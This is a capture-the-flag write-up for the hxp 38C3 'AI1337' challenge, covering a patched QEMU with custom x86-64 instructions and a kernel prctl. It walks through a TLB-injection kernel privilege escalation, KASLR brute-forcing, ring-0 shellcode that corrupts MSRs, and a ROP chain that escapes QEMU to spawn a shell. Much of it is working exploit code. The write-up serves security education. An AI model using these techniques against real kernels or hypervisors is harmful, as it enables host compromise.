Tags: x86-64 pwn qemu kernel amd64 

Rating:

author: 0x6fe1be2

Description:

You have the great pleasure of sampling our HXP HACK-4 AI1337 processor - an intersection of Security and AI.
Like it? We have many in the pipeline!

Dist

-- sisu

TL;DR

The challenge consists of a modified QEMU binary which adds new instructions to the existing x86-64 set, notably MTS (load bytes from scratch memory), STM (store bytes to scratch memory) which are unprivileged and SCRHLW (update scratch memory) which is privileged.
Additionally two MSR (Model Specific Registers) where added MSR_HACK4_SLICE_SIZE=0x400 and MSR_HACK4_NUM_SLICES=33 The privileged SCRHLW instruction can be access through a patched in prctl option PR_SET_SCRATCH_HOLE inside the linux kernel and seems to directly update the TLB (Translation Lookaside Buffer) which we can exploit.

  1. We exploit the TLB update in SCRHLW to inject CPL0 shellcode
  2. We modify the MSR to allow OOB Access, they are mapped to a stack array in QEMU
  3. we use the OOB Access to write a ROP Chain inside QEMU, to escape and get the flag

Overview

Lets give a brief overview of the challenge components.

Files

hxp_silicon_foundaries_hack4-7786be6f6ac42883.tar.xz

.
└── hxp_silicon_foundaries_hack4
    ├── Dockerfile
    ├── bzImage
    ├── compose.yml
    ├── example_program
    │   ├── ai.s
    │   ├── build.sh
    │   └── main.c
    ├── flag.txt
    ├── hxp_ai1337.pdf
    ├── initramfs.cpio
    ├── launch_vm.sh
    ├── linux_build
    │   └── 0001-Add-PR_SET_SCRATCH_HOLE.patch
    ├── pow-solver
    ├── pow-solver.cpp
    ├── qemu_build
    │   ├── 0001-Add-hack4-ai1337.patch
    │   ├── Dockerfile
    │   └── build_package
    │       ├── bios-256k.bin
    │       ├── efi-e1000.rom
    │       ├── kvmvapic.bin
    │       ├── linuxboot_dma.bin
    │       └── qemu_system_x86_64_ai1337
    └── ynetd

Deployment

The challenge creators where nice enough to give us basically all files necessary for deploying the challenges. This is going to be mostly interesting when exploiting the QEMU binary as this pretty similar to userland exploitation and knowing the correct libraries through the Dockerfile will be helpful.

We can also see that the flag is not inside the VM telling us that we will have to escape QEMU if we want to get it.

Challenge

Now lets look at the more interesting files:

Kernel

The kernel related files seem to be rather standard, we have a initramfs.cpio which contains our filesystems (Note: kernel challenges normally don't bother booting into a e.g. XFS rootfs and just stay inside the initramfs) and a kernel bzImage (which seems to be 6.12.1).

We have also been give a kernel patch file, which seems to add a new prctl option called PR_SET_SCRATCH_HOLE and seems to execute a "new" assembly instruction SCRHLW, which has been added through QEMU.

0001-Add-PR_SET_SCRATCH_HOLE.patch
Details

Even though the linux kernel doesn't seem to have a deliberate vulnerability it will be important, because we start out as a unprivileged user. Usually QEMU exploit require CPL0 (Ring 0) access, which we should keep in mind.

QEMU

QEMU seems to be the focus of this challenge. We are given a patched binary qemu_system_x86_64_ai1337 and a patch file which we will have to analyse, because it's probably where the vulnerability will lie.

0001-Add-hack4-ai1337.patch
Details

Also luckily for use we have been given a assembly file that provides stubs for interacting with the custom instructions.

ai.s
Details

last but not least we have the command used for starting the VM. One important thing to notice is that neither smap nor smep are enabled allowing us to write a 2nd stage payload directly in userland and jumping to it, without requiring disabling them through CR4 first.

launch_vm.sh
Details

Docs

We have also been give some form of Device Specification in form of a .pdf (hxp_silicon_foundaries_hack4/hxp_ai1337.pdf) and .rst . Which seems to explain a number of Instructions/MSRs which have been added through QEMU and will be the target of our exploit:

Instructions:

OpcodeInstructionDescription
0F 0A 83MTSLoad RCX bytes from memory address (RSI) to slice (RBX) at slice offset (RDI)
0F 0A 84STMRead RCX bytes from slice (RBX) at slice offset (RDI) and write memory address (RSI)
0F 0A 85FSCRClear all slices
0F 0A 86SCRADDAdd the slices pointed by RDI and RSI, and store the result into slice pointed by RDX
0F 0A 87SCRSUBSubtract the slices pointed by RDI and RSI, and store the result into slice pointed by RDX
0F 0A 88SCRMULMultiply the slices pointed by RDI and RSI, and store the result into slice pointed by RDX
0F 0A 89SCRHLW (privileged)Update scratch memory PSCHORR bi-ATS base VA
0F 0A 8ASCRHLRRead scratch memory PSCHORR bi-ATS base VA

MSRs:

MSRIdentifierDescription
MSR_HACK4_SLICE_SIZE0xC0000105Read/Write slice size in the AI1337 engine
MSR_HACK4_NUM_SLICES0xC0000106Read/Write count of slices in the AI1337 engine

We also receive multiple ASCII diagrams notably this one, which is going to be relevant for our exploit.

      Physical Memory                Virtual Memory
            0                               |
            |                               |
  IO space  |                               |
            |                               |
            -                               |
            |                               |
            |                               |
            |                               |   Direct Addressing
    RAM     |                               |           |
            |    ___________________________|_____      |
            |   /                       |        |      |
            ---/                        | bi-ATS |------|
            |                           |        |
            |    _______________________|________|
  AI1337    |   /
 aperture   |  /  PSCHORR Interconnect
            ---

Test Environment

I'm using the following tools for writing and testing my exploit:

  • vagd userland exploitation templates using docker which is based on pwntools
  • how2keap kernel exploitation template
  • pwndbg gdb plugin for kernel- and userland exploitation

Exploit

Lets start with writing our exploit:

Vulnerabilities

As teased before there seem to be vulnerabilities in the implementation of the x86-64 extension called AI1337. Let's have a closer look at the patches

First some constants are defined which will be relevant for the patch.

target/i386/ops_ai1337.h

#define AI1337_SCRATCH_SIZE (33ULL * 1024)
#define AI1337_SCRATCH_MAX_NUM_SLICES (128)
#define AI1337_SCRATCH_SLICE_SIZE_DEFAULT (1024ULL)
#define AI1337_SCRATCH_NUM_SLICES_DEFAULT (33UL)
#define AI1337_SCRATCH_MAX_SLICE_SIZE (4096ULL)

Then we need to initialise our new variable directly in the CPU. Note that we use a stack array cratch[AI1337_SCRATCH_SIZE] and use it for our scratch operations. It seems like this won't be able to hold AI1337_SCRATCH_MAX_NUM_SLICES * AI1337_SCRATCH_MAX_SLICE_SIZE (Foreshadowing).

target/i386/cpu.c

...
        env->scratch_config.num_active_slices = AI1337_SCRATCH_NUM_SLICES_DEFAULT;
        env->scratch_config.slice_size = AI1337_SCRATCH_SLICE_SIZE_DEFAULT;
        env->scratch_config.va_base = AI1337_SCRATCH_VA_BASE;
        env->scratch_config.phys_base = AI1337_SCRATCH_PHYS_BASE;
        env->scratch_config.access_enabled = 0;

        uint16_t scratch[AI1337_SCRATCH_SIZE];
        env->scratch_region = malloc(sizeof(MemoryRegion));
        memset(env->scratch_region, 0, sizeof(*env->scratch_region));
        memory_region_init_ram_ptr(env->scratch_region, NULL, "ai1337-scratch", AI1337_SCRATCH_SIZE, scratch);
        env->scratch_region->ram_block->flags |= RAM_RESIZEABLE;
        env->scratch_region->ram_block->max_length = AI1337_SCRATCH_MAX_NUM_SLICES * AI1337_SCRATCH_MAX_SLICE_SIZE;
        memory_region_add_subregion(get_system_memory(), AI1337_SCRATCH_PHYS_BASE, env->scratch_region);
        ...

When we edit MSR we directly change the values inside our CPU config without reinitialising our scratch_region which should lead to a OOB. Sadly we are only able to edit MSR directly in CPL0 which isn't possible with a unprivileged user.

target/i386/tcg/sysemu/misc_helper.c

...
static bool helper_recalculate_scratch(CPUX86State *env, uint32_t new_num_slices, uint32_t new_slice_size)
{
    if (new_num_slices > AI1337_SCRATCH_MAX_NUM_SLICES) {
        return false;
    }
    if (new_slice_size > AI1337_SCRATCH_MAX_SLICE_SIZE) {
        return false;
    }
    uint32_t new_size = new_num_slices * new_slice_size;
    Error *err = NULL;
    bql_lock();
    memory_region_ram_resize(env->scratch_region, new_size, &err);
    bql_unlock();
    if (err) {
        return false;
    }
    env->scratch_config.num_active_slices = new_num_slices;
    env->scratch_config.slice_size = new_slice_size;
    return true;
}

void helper_wrmsr(CPUX86State *env)
...
    case MSR_HACK4_SLICE_SIZE:
        const uint32_t new_slice_size = val;
        if (!helper_recalculate_scratch(env, env->scratch_config.num_active_slices, new_slice_size)) {
            goto error;
        }
        break;
    case MSR_HACK4_NUM_SLICES:
        const uint32_t new_num_active_slices = val;
        if (!helper_recalculate_scratch(env, new_num_active_slices, env->scratch_config.slice_size)) {
            goto error;
        }
        break;
...
void helper_rdmsr(CPUX86State *env)
...
    case MSR_HACK4_SLICE_SIZE:
        val = env->scratch_config.slice_size;
        break;
    case MSR_HACK4_NUM_SLICES:
        val = env->scratch_config.num_active_slices;
        break;
...

And yeah it looks like we have a OOB when writing or reading from the scratch_region after editing the MSR.

target/i386/tcg/translate.c

...
static void gen_mts_8(DisasContext *s, MemOp ot)
{
    const size_t slice_size_offset = offsetof(CPUX86State, scratch_config.slice_size);
    const size_t va_base_offset = offsetof(CPUX86State, scratch_config.va_base);
    const size_t access_offset = offsetof(CPUX86State, scratch_config.access_enabled);

    const TCGv slice_index = cpu_regs[R_EBX];
    const TCGv offset_in_slice = cpu_regs[R_EDI];
    const TCGv memory_address = cpu_regs[R_ESI];
    const TCGv dshift = gen_compute_Dshift(s, ot);

    tcg_gen_st_tl(tcg_constant_i64(1), tcg_env, access_offset);

    // load from memory address
    gen_lea_v_seg(s, memory_address, R_DS, -1);
    gen_op_ld_v(s, MO_8, s->T0, s->A0);

    // Calculate address for scratch
    // A0 = offset_in_slice + slice_base + (slice_index * slice_size)
    tcg_gen_ld_tl(s->A0, tcg_env, va_base_offset);
    gen_lea_v_seg(s, s->A0, R_ES, -1);
    tcg_gen_add_tl(s->A0, s->A0, offset_in_slice);
    tcg_gen_ld32u_tl(s->tmp0, tcg_env, slice_size_offset);
    tcg_gen_mul_tl(s->tmp0, s->tmp0, slice_index);
    tcg_gen_add_tl(s->A0, s->A0, s->tmp0);

    // Store value
    gen_op_st_v(s, MO_8, s->T0, s->A0);

    gen_op_add_reg(s, s->aflag, R_ESI, dshift);
    gen_op_add_reg(s, s->aflag, R_EDI, dshift);

    tcg_gen_st_tl(tcg_constant_i64(0), tcg_env, access_offset);
}

static void gen_stm_8(DisasContext *s, MemOp ot)
{
    ...
    // similar to gen_mts_8
    ...
}

Finally let's have a look at the inner workings of SCRHLW.

target/i386/tcg/emit.c.inc

static void gen_SCRHLW(DisasContext *s, X86DecodedInsn *decode)
{
    if (CPL(s) != 0)
    {
        gen_illegal_opcode(s);
        return;
    }
    size_t va_base_offset = offsetof(CPUX86State, scratch_config.va_base);
    tcg_gen_st_tl(cpu_regs[R_EDI], tcg_env, va_base_offset);
}

And we notice that this seems to unsafely update the TLB, which we can exploit. This seems to implement the functionally described in the diagram before notably our scratch_region is made directly accessible through virtual memory using the TLB.

target/i386/tcg/sysemu/excp_helper.c

...
bool x86_cpu_tlb_fill(CPUState *cs, vaddr addr, int size,
                      MMUAccessType access_type, int mmu_idx,
                      bool probe, uintptr_t retaddr)
...
    if (env->scratch_config.access_enabled &&
        (addr >= env->scratch_config.va_base) &&
        ((addr + size) <= (env->scratch_config.va_base + x86_calculate_scratch_size(env)))) {
        vaddr paddr = env->scratch_config.phys_base + (addr - env->scratch_config.va_base);
        tlb_set_page_with_attrs(cs, addr & TARGET_PAGE_MASK,
                                paddr & TARGET_PAGE_MASK,
                                cpu_get_mem_attrs(env),
                                PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE);
        return true;
    }
...

Sadly SCRHLW is only accessible when in CPL0, but luckily for us they patched the kernel to give us access through prctl

include/uapi/linux/prctl.h

...
#define PR_SET_SCRATCH_HOLE     0x53534352
...

kernel/sys.c

static noinstr int prctl_set_scratch_hole(unsigned long opt, unsigned long addr,
                  unsigned long size, unsigned long arg)
{
    const u64 new_scratch_hole = opt;
    if ((new_scratch_hole & 0xFFFUL) != 0U) {
        return -EINVAL;
    }
    if (new_scratch_hole < mmap_min_addr) {
        return -EINVAL;
    }
    asm volatile(
        "mov %0, %%rdi\n\t"
        ".byte 0x0f; .byte 0x0a; .byte 0x89\n\t" // scrhlw
        :
        : "r"(new_scratch_hole)
        : "rdi", "memory"
    );
    return 0;
}

...
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
        unsigned long, arg4, unsigned long, arg5)  
...
    case PR_SET_SCRATCH_HOLE:
        error = prctl_set_scratch_hole(arg2, arg3, arg4, arg5);
        break;
...

Linux Privilege Escalation

so how do we exploit a unsafe TLB update? Well basically this allows us to corrupt and virtual memory mapping we want (even CPL0 ones) as long as there is no existing TLB entry (this is an important consideration).

Also luckily for us KASLR is notoriously bad and only 16bit (kaslr.c), which is realistically brute-forcible with a non crashing spray, which we have.

TLB Inject

So yeah we create a simple PoC script that sprays NOPs (0x90) and see if we create a segfault inside the kernel.

#define START_SEARCH 0xffffffff80000000
#define END_SEARCH   0xfffffffffff00000
int main(int argc, char *argv[]) {

  lstage("INIT");
  

  // cyclic_cpy(spray, 0x1000);
  rlimit_increase(RLIMIT_NOFILE);
  pin_cpu(0, 0);

  // Gather info about scratch memory
  scratch_info info = {0};
  get_scratch_info(&info);
  linfo("Scratch info:");
  linfo(" - scratch addr: 0x%lx", info.scratch_addr);
  linfo(" - scratch default size: 0x%lx bytes", info.scratch_default_size);
  linfo(" - scratch max slice size: 0x%x bytes", info.scratch_max_slice_size);
  linfo(" - scratch max slice count: %u", info.scratch_max_slice_count);

  linfo("PSCHORR bi-ATS base VA: %p", read_ats_base());

  lstage("START");

  size_t slice_size_value = 0x400;
  size_t *trampolin = (size_t*) 0x6fe1be2000;

  char package[0x8000];
  memset(package, 0x90, sizeof(package)); // spary int3
  memcpy(&package[sizeof(package) - sizeof(pivot)], pivot, sizeof(pivot));

  SYSCHK(prctl(PR_SET_SCRATCH_HOLE, trampolin));
  for (size_t i = 0; i < sizeof(package) / 0x400; i++) {
    load_scratch(i, 0, &package[i * slice_size_value], slice_size_value);
  }

  pid_t pid = fork();
  if (pid == 0) {
    linfo("crash and corrupt CPL0 TLB: %p", payload);
    load_scratch(-1, 0, "X", 1); // segfault
  }
  wait(NULL); // clear TLB allowing injection
  linfo("spray kaslr");

  for (trampolin = (size_t*) (START_SEARCH); 
      trampolin < END_SEARCH; trampolin += 0x100000 / sizeof(size_t)) {
    // linfo("spray aslr: %p", trampolin);
    SYSCHK(prctl(PR_SET_SCRATCH_HOLE, trampolin));
    if (((size_t) trampolin & 0xfffffff) == 0)
      linfo("spray aslr: %p", trampolin);
    // flush TLB
    pid_t pid = fork();
    if (pid == 0) 
      load_scratch(-1, 0, "X", 1);
    wait(NULL);
  }
  putchar('\n');

  lstage("END");
}

And luckily we get the following, which indicates that our NOP-Sled spray worked and we tried to execute some invalid NULL Bytes afterwards.

[    3.646252] Call Trace:
[    3.646354]  <TASK>
[    3.655379] Oops: general protection fault, probably for non-canonical address 0x257830203a731fb1: 0000 [#23] PREEMPT SMP NOPTI
[    3.655877] CPU: 0 UID: 1000 PID: 57 Comm: pwn Not tainted 6.12.1 #2
[    3.656141] RIP: 0010:0xffffffff81008000
[    3.656332] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 <00> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[    3.657072] RSP: 0018:ffffc90000114800 EFLAGS: 00010007
[    3.657284] RAX: 257830203a731fb1 RBX: 48c35b02760100c5 RCX: 0000000000000000
[    3.657546] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 48c35b02760100c5
[    3.657791] RBP: ffffc900001149c8 R08: ffffffff81c95968 R09: 00000000ffffefff
[    3.658058] R10: ffffffff81c25980 R11: ffffffff81c7d980 R12: 48c35b02760100c5
[    3.658323] R13: ffffc90000114900 R14: ffffc900001149c8 R15: ffffffff81ac882d
[    3.658584] FS:  000000000040c878(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[    3.658871] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    3.659078] CR2: 257830203a731fb1 CR3: 00000000028b4000 CR4: 00000000000006b0
[    3.659330] Call Trace:
[    3.659457]  <TASK>
[    3.668313] Oops: general protection fault, probably for non-canonical address 0x257830203a732031: 0000 [#24] PREEMPT SMP NOPTI
[    3.668793] CPU: 0 UID: 1000 PID: 57 Comm: pwn Not tainted 6.12.1 #2
[    3.669052] RIP: 0010:0xffffffff81008000

CPL0 Shellcode

So next we need to create some CPL0 Shellcode.

Corrupt MSR

Let's start out simple and just overwrite the MSRs with the respective max values and to our luck it works.

crpt_msr.S

; nasm -f bin ./crpt_msr.S && xxd -i crpt_msr > crpt_msr.h
 
MSR_HACK4_SLICE_SIZE equ 0xc0000105
MSR_HACK4_NUM_SLICES equ 0xc0000106

BITS 64
  xor rdx, rdx

  mov rax, 0x1000
  mov ecx, MSR_HACK4_SLICE_SIZE 
  wrmsr

  mov rax, 128
  mov ecx, MSR_HACK4_NUM_SLICES
  wrmsr

  int3

crpt_msr.h

unsigned char crpt_msr[] = {
  0x48, 0x31, 0xd2, 0xb8, 0x00, 0x10, 0x00, 0x00, 0xb9, 0x05, 0x01, 0x00,
  0xc0, 0x0f, 0x30, 0xb8, 0x80, 0x00, 0x00, 0x00, 0xb9, 0x06, 0x01, 0x00,
  0xc0, 0x0f, 0x30, 0xcc
};
unsigned int crpt_msr_len = 28;
...
  char package[0x8000];
  memset(package, 0x90, sizeof(package));
  memcpy(&package[sizeof(package) - sizeof(crpt_msr)], pivot, sizeof(crpt_msr));
...

Pivot

Now we need to somehow continue our exploit. As mentioned before neither smap nor smep are enabled allowing us to directly jump back into userspace so let's do that.

pivot.S

; nasm -f bin ./pivot.S && xxd -i pivot > pivot.h
 
MSR_HACK4_SLICE_SIZE equ 0xc0000105
MSR_HACK4_NUM_SLICES equ 0xc0000106

BITS 64
  xor rdx, rdx

  mov rax, 0x1000
  mov ecx, MSR_HACK4_SLICE_SIZE 
  wrmsr

  mov rax, 128
  mov ecx, MSR_HACK4_NUM_SLICES
  wrmsr

  scasb
  mov r15, 0x1111111111111111
  call r15


pivot.h

unsigned char pivot[] = {
  0x48, 0x31, 0xd2, 0xb8, 0x00, 0x10, 0x00, 0x00, 0xb9, 0x05, 0x01, 0x00,
  0xc0, 0x0f, 0x30, 0xb8, 0x80, 0x00, 0x00, 0x00, 0xb9, 0x06, 0x01, 0x00,
  0xc0, 0x0f, 0x30, 0xae, 0x49, 0xbf, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11,
  0x11, 0x11, 0x41, 0xff, 0xd7
};
unsigned int pivot_len = 41;
...
void payload() {
    asm("int3");
}
...
  size_t* p = memmem(pivot, sizeof(pivot), "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
  if (p != NULL) 
    *p = (size_t) &payload;
...

AND IT WORKS!

QEMU Escape

After corrupting the MSRs to achieve OOB we can simply get memory leaks inside QEMU and then use that information to drop a shell and read the flag.

#define BOF_IDX      16
#define BOF_OFFSET   0x800

void payload() {
  char leak[0x400];
  read_scratch(BOF_IDX, BOF_OFFSET, leak, sizeof(leak));
  size_t offset = 0x3d8;

  size_t libc = *(size_t*)&leak[0x378] - 0x11b9e1; 
  load_scratch(0, 0, &me, 8);
  load_scratch(0, 8, &libc, 8);

  size_t bof_size = sizeof(leak) - offset;
  char* bof = leak + offset;

  bzero(bof, bof_size);
  ((size_t*)bof)[0] = libc + 0x10f75b+1; // ret 
  ((size_t*)bof)[1] = libc + 0x10f75b;   // pop rdi; ret 
  ((size_t*)bof)[2] = libc + 0x1cb42f;   // "/bin/sh"
  ((size_t*)bof)[3] = libc + 0x58740;    // system
  load_scratch(BOF_IDX, BOF_OFFSET + offset, bof, bof_size);
  for(;;);
}

Final

pwn.c
Details

FLAG: hxp{tH1s_1s_th3_AI_$$$s3Ri3$$$_n0t_tH3_s3CuR3_s3R1eS}

Original writeup (https://hofhackerei.at/blog/hxp_38c3_hack4/).